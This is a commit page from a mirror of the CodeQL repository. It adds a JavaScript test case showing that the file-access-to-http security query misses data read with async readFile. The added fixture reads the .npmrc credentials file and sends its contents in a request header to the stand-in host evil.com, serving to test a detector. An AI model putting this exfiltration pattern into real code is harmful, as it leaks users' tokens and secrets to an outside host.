hohn/codeql
1
0
Fork 0
mirror of https://github.com/github/codeql.git synced 2026-04-23 07:45:17 +02:00
Code Issues Packages Projects Releases Wiki Activity

Added test case with async readFile, currently not flagged.

Browse Source
This commit is contained in:
Napalys
2025-03-26 14:21:44 +01:00
parent 9d3d3deffa
commit 762ca2f8f5
1 changed files with 18 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

18
javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js
View File

@@ -8,3 +8,21 @@ https.get({
method: "GET",
headers: { Referer: content }
}, () => { }); // $ Alert[js/file-access-to-http]
const fsp = require("fs").promises;
(async function sendRequest() {
try {
const content = await fsp.readFile(".npmrc", "utf8"); // $ MISSING: Source[js/file-access-to-http]
https.get({
hostname: "evil.com",
path: "/upload",
method: "GET",
headers: { Referer: content }
}, () => { }); // $ MISSING: Alert[js/file-access-to-http]
} catch (error) {
console.error("Error reading file:", error);
}
})();